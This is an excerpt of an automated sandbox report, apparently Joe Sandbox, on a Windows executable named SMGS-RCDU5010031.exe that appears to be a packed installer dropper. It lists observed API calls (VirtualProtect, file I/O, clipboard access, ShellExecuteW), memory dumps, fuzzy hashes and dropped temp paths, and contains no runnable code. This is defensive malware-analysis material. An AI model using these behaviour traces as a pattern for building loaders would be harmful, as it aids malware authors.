• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
• Instruction ID: ed87ac6fe78c97b3ff6a715646c68139f6b7da630c9be1cec1260a384e7beadd
• Opcode Fuzzy Hash: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
• Instruction Fuzzy Hash: 3AE0E676154108BFDB01DFA5EE47FE977ECAB44704F048035BA08D7091C674F5508768
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
• Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
• Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
• Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
• Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
• Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
• Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
• Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00403266
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
• Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
• Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
• Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
• Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,00000403), ref: 0040534C
• GetDlgItem.USER32(?,000003EE), ref: 0040535B
• GetClientRect.USER32(?,?), ref: 00405398
• GetSystemMetrics.USER32(00000002), ref: 0040539F
• SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
• ShowWindow.USER32(?,00000008), ref: 0040543B
• GetDlgItem.USER32(?,000003EC), ref: 0040545C
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
• GetDlgItem.USER32(?,000003F8), ref: 0040536A
  • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,?,00403F75), ref: 00404157
• GetDlgItem.USER32(?,000003EC), ref: 004054AE
• CreateThread.KERNEL32(00000000,00000000,Function_00005282,00000000), ref: 004054BC
• CloseHandle.KERNEL32(00000000), ref: 004054C3
• ShowWindow.USER32(00000000), ref: 004054E7
• ShowWindow.USER32(00000000,00000008), ref: 004054EC
• ShowWindow.USER32(00000008), ref: 00405536
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
• CreatePopupMenu.USER32 ref: 0040557B
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
• GetWindowRect.USER32(?,?), ref: 004055AF
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
• OpenClipboard.USER32(00000000), ref: 00405610
• EmptyClipboard.USER32 ref: 00405616
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
• GlobalLock.KERNEL32(00000000), ref: 0040562C
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
• GlobalUnlock.KERNEL32(00000000), ref: 00405660
• SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
• CloseClipboard.USER32 ref: 00405671
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: c4b52b2e618ac1b4ceb8eccc4828d65ce2d69768586c872b5e4af6598ace69d9
• Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
• Opcode Fuzzy Hash: c4b52b2e618ac1b4ceb8eccc4828d65ce2d69768586c872b5e4af6598ace69d9
• Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003FB), ref: 004045FE
• SetWindowTextW.USER32(00000000,?), ref: 00404628
• SHBrowseForFolderW.SHELL32(?), ref: 004046D9
• CoTaskMemFree.OLE32(00000000), ref: 004046E4
• lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404716
• lstrcatW.KERNEL32(?,Call), ref: 00404722
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
  • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
  • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
  • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
  • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
  • Part of subcall function 004062E4: CharPrevW.USER32(?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
• GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,?,0042B218,?,?,000003FB,?), ref: 004047F7
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
  • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
  • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
  • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$Call
                                                                                                                                                                                                          • API String ID: 2624150263-211385702
                                                                                                                                                                                                          • Opcode ID: 7c84fd604c64be66d5e66193ff5fa4d290b9f71cf9d700dc6b5080d1f641d0f0
                                                                                                                                                                                                          • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c84fd604c64be66d5e66193ff5fa4d290b9f71cf9d700dc6b5080d1f641d0f0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
• GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
• lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
• lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
• GlobalFree.KERNEL32(00000000), ref: 10001C89
• GlobalFree.KERNEL32(?), ref: 10001D83
• GlobalFree.KERNEL32(?), ref: 10001D88
• GlobalFree.KERNEL32(?), ref: 10001D8D
• GlobalFree.KERNEL32(00000000), ref: 10001F38
• lstrcpyW.KERNEL32(?,?), ref: 1000209C
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc
• String ID:
• API String ID: 4227406936-0
• Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
• Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
• Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
• Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(004085F0,?,?,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
Strings
• C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes, xrefs: 00402154
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes
• API String ID: 542301482-2590807967
• Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
• Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
• Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
• Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
• Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
• Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
• Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                          • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• CheckDlgButton.USER32(?,-0000040A,?), ref: 0040434F
• GetDlgItem.USER32(?,000003E8), ref: 00404363
• SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404380
• GetSysColor.USER32(?), ref: 00404391
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
• lstrlenW.KERNEL32(?), ref: 004043B2
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
• GetDlgItem.USER32(?,0000040A), ref: 0040442D
• SendMessageW.USER32(00000000), ref: 00404434
• GetDlgItem.USER32(?,000003E8), ref: 0040445F
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
• LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
• SetCursor.USER32(00000000), ref: 004044B3
• ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,?), ref: 004044C8
• LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
• SetCursor.USER32(00000000), ref: 004044D7
• SendMessageW.USER32(00000111,?,00000000), ref: 00404506
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: (B@$Call$N$open
• API String ID: 3615053054-1706805125
• Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
• Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
• Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
• Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,?), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,Snubbendes Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
